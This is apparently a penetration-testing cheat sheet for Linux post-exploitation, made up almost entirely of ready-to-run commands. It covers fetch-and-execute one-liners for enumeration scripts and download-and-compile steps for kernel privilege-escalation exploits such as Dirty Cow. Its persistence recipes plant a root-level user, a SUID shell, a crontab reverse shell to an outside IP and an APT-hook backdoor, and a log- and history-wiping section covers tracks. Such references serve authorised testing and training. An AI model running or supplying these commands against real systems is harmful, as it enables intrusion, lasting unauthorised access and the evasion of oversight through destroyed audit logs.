Linux Exploit#
Tradecraft for the operator on a Linux foothold. Enumeration runs through LinEnum, BeRoot, and linux-smart-enumeration; common kernel exploits handle privilege escalation; persistence chains and cover-track recipes round out the kit.
LinEnum#
Scripted local Linux enumeration and privilege-escalation checks. Place the script on the target host.
Categories: kernel and distribution, system info, user info, privileged access, environmental, jobs / tasks, services, version info, default / weak credentials, useful file searches, platform / software tests.
Full host enumeration with report output into /tmp.
$ linenum.sh -s -r report.txt -e /tmp/ -t
Direct execution one-liners.
$ bash <(wget -q -O - https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) \
-r report.txt -e /tmp/ -t -i
$ bash <(curl -s https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) \
-r report.txt -e /tmp/ -t -i
BeRoot#
Post-exploitation tool to check common misconfigurations on Linux and
macOS to find a path to escalate. linux-exploit-suggester is
embedded. Place the script on the target.
Categories: GTFOBins, wildcards, sensitive files, services, SUID binaries, PATH environment variable, NFS root squashing, LD_PRELOAD, sudoers file, sudo list, Python library hijacking, capabilities, ptrace scope, exploit suggest.
Basic enumeration.
$ python beroot.py
# If you have a user password
$ python beroot.py --password <PASS>
Linux smart enumeration#
Linux enumeration tool for pentesting and CTFs with verbosity levels. Place the script on the target.
Categories: user, sudo, file system, system, security measures, recurrent tasks (cron, timers), network, services, processes, software, container (docker, lxc).
$ lse.sh # basic
$ lse.sh -l1 # verbose
$ lse.sh -l2 # dump everything
One-liner download and chmod.
$ wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh
$ curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh; chmod 700 lse.sh
Direct execution one-liner.
$ bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -i
$ bash <(curl -s https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l1 -i
Common exploits#
CVE-2010-3904, Linux RDS, kernel
<= 2.6.36-rc8(https://www.exploit-db.com/exploits/15285).CVE-2010-4258, kernel
<= 2.6.37“Full-Nelson.c” (https://www.exploit-db.com/exploits/15704).CVE-2012-0056, Mempodipper, kernel 2.6.39 to 3.2.2 (Gentoo / Ubuntu x86/x64).
$ wget -O exploit.c http://www.exploit-db.com/download/18411 $ gcc -o mempodipper exploit.c $ ./mempodipper
CVE-2016-5195, Dirty Cow, kernel
<= 3.19.0-73.8(https://dirtycow.ninja/).# compile dirty cow $ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
CVE-2010-3904, RDS protocol, kernel 2.6.32.
Cross-compiling with GCC.
# 32 bit
$ gcc -m32 -o hello_32 hello.c
# 64 bit
$ gcc -m64 -o hello_64 hello.c
Persistence#
Create a root user.
$ sudo useradd -ou 0 -g 0 john
$ sudo passwd john
$ echo "linuxpassword" | passwd --stdin john
SUID binary.
TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant
Crontab reverse shell.
$ (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash") | crontab 2> /dev/null
Backdoor APT.
# apt.conf.d directory
APT::Update::Pre-Invoke {"CMD"};
# When target runs "apt-get update" your CMD will be executed.
# example
$ echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
Cover tracks#
# Reset logfile to 0 without restarting syslogd
$ cat /dev/null > /var/log/auth.log
# Clear terminal history
$ cat /dev/null > ~/.bash_history
$ history -c
$ export HISTFILESIZE=0
$ export HISTSIZE=0
$ unset HISTFILE